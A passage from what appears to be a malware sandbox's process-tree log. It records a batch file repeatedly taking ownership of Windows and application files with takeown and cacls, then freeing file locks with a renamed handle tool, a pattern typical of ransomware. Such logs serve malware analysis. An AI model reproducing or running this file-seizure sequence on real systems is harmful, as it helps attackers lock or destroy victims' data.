- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:5420
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:5376
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    - Modifies file permissions
    PID:5360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "background.png" -nobanner
    3⤵
    PID:5268
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "background.png" -nobanner
      4⤵
      PID:5548
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5608
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json""
  2⤵
  PID:5600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json" /E /G Admin:F /C
    3⤵
    PID:5476
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json"
    3⤵
    - Modifies file permissions
    PID:5716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "utc.tracing.json" -nobanner
    3⤵
    PID:5736
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "utc.tracing.json" -nobanner
      4⤵
      PID:5800
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5684
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""
  2⤵
  PID:5512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C
    3⤵
    PID:5880
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"
    3⤵
    - Modifies file permissions
    PID:5960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
    3⤵
    PID:5964
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
      4⤵
      PID:5844
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json""
  2⤵
  PID:5676
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json" /E /G Admin:F /C
    3⤵
    PID:6012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json"
    3⤵
    - Modifies file permissions
    PID:6016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner
    3⤵
    PID:5188
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner
      4⤵
      PID:6076
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6040
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\Diagnosis\osver.txt""
  2⤵
  PID:5032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\osver.txt" /E /G Admin:F /C
    3⤵
    PID:5164
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\osver.txt"
    3⤵
    - Modifies file permissions
    PID:4344
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "osver.txt" -nobanner
    3⤵
    PID:4928
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "osver.txt" -nobanner
      4⤵
      PID:5428
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5328
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk""
  2⤵
  PID:5556
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk" /E /G Admin:F /C
    3⤵
    PID:4112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk"
    3⤵
    - Modifies file permissions
    PID:5404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "edb.chk" -nobanner
    3⤵
    PID:5708
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "edb.chk" -nobanner
      4⤵
      PID:5728
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5776
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""
  2⤵
  PID:5688
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C
    3⤵
    PID:5288
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"
    3⤵
    - Modifies file permissions
    PID:5912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
    3⤵
    PID:5968
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
      4⤵
      PID:5828
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5872
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp""
  2⤵
  PID:5932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp" /E /G Admin:F /C
    3⤵
    PID:5988
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp"
    3⤵
    - Modifies file permissions
    PID:5208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "AcroRdrDCUpd1901020069.msp" -nobanner
    3⤵
    PID:6028
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "AcroRdrDCUpd1901020069.msp" -nobanner
      4⤵
      PID:2528
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6124
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:6100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:5088
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    - Modifies file permissions
    PID:5308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "background.png" -nobanner
    3⤵
    PID:5468
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "background.png" -nobanner
      4⤵
      PID:5124
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5396
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\Diagnosis\parse.dat""
  2⤵
  PID:3440
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\parse.dat" /E /G Admin:F /C
    3⤵
    PID:5748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\parse.dat"
    3⤵
    PID:5772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "parse.dat" -nobanner
    3⤵
    PID:5380
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "parse.dat" -nobanner
      4⤵
      PID:5612
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5700
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs""
  2⤵
  PID:5940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs" /E /G Admin:F /C
    3⤵
    PID:5824
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs"
    3⤵
    - Modifies file permissions
    PID:5460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "edbres00001.jrs" -nobanner
    3⤵
    PID:5316
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "edbres00001.jrs" -nobanner
      4⤵
      PID:5216
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6056
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:6008
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:6036
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    - Modifies file permissions
    PID:5536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:5344
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:5260
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5152
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json""
  2⤵
  PID:4988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json" /E /G Admin:F /C
    3⤵
    PID:4992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json"
    3⤵
    - Modifies file permissions
    PID:4424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "utc.cert.json" -nobanner
    3⤵
    PID:5596
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "utc.cert.json" -nobanner
      4⤵
      PID:5544
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5836
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""
  2⤵
  PID:5616
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C
    3⤵
    PID:5300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"
    3⤵
    - Modifies file permissions
    PID:5648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "StorageHealthModel.dat" -nobanner
    3⤵
    PID:6020
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "StorageHealthModel.dat" -nobanner
      4⤵
      PID:1444
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5848
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""
  2⤵
  PID:5884
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:5256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"
    3⤵
    - Modifies file permissions
    PID:5348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:5160
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      PID:6128
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6060
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""
  2⤵
  PID:5060
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C
    3⤵
    PID:5572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"
    3⤵
    - Modifies file permissions
    PID:5928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
    3⤵
    PID:5292
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
      4⤵
      PID:5248
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5788
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb""
  2⤵
  PID:280
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb" /E /G Admin:F /C
    3⤵
    PID:5680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb"
    3⤵
    - Modifies file permissions
    PID:5464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "vedatamodel.edb" -nobanner
    3⤵
    PID:5888
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "vedatamodel.edb" -nobanner
      4⤵
      PID:5364
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4908
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl""
  2⤵
  PID:5304
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl" /E /G Admin:F /C
    3⤵
    PID:5340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl"
    3⤵
    - Modifies file permissions
    PID:5528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner
    3⤵
    PID:6104
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner
      4⤵
      PID:5532
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5448
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm""
  2⤵
  PID:5504
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm" /E /G Admin:F /C
    3⤵
    PID:5452
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm"
    3⤵
    - Modifies file permissions
    PID:5516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "qmgr.jfm" -nobanner
    3⤵
    PID:5520
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "qmgr.jfm" -nobanner
      4⤵
      PID:5352
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""
  2⤵
  PID:5952
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C
    3⤵
    PID:5632
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"
    3⤵
    - Modifies file permissions
    PID:4220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
    3⤵
    PID:5664
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
      4⤵
      PID:5692
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:6112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:6140
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    PID:5832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:5312
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:5920
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm""
  2⤵
  PID:5636
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm" /E /G Admin:F /C
    3⤵
    PID:5868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm"
    3⤵
    PID:5780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "SmsInterceptStore.jfm" -nobanner
    3⤵
    PID:5668
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "SmsInterceptStore.jfm" -nobanner
      4⤵
      PID:5508
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:5624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:5584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    - Modifies file permissions
    PID:6136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:6092
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:5284
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5936
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
  2⤵
  PID:5756
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C
    3⤵
    PID:5180
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
    3⤵
    - Modifies file permissions
    PID:5172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "OfficeIntegrator.ps1" -nobanner
    3⤵
    PID:5148
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "OfficeIntegrator.ps1" -nobanner
      4⤵
      PID:6072
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:6064
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:5472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    - Modifies file permissions
    PID:5444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K9TOpZud.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:4720
  - - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
      K9TOpZud.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:2972
- - C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe
    K9TOpZud.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anfTj4k7.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
  2⤵
  PID:5388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C
    3⤵
    PID:5168
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"
    3⤵
    - Modifies file permissions
    PID:5576
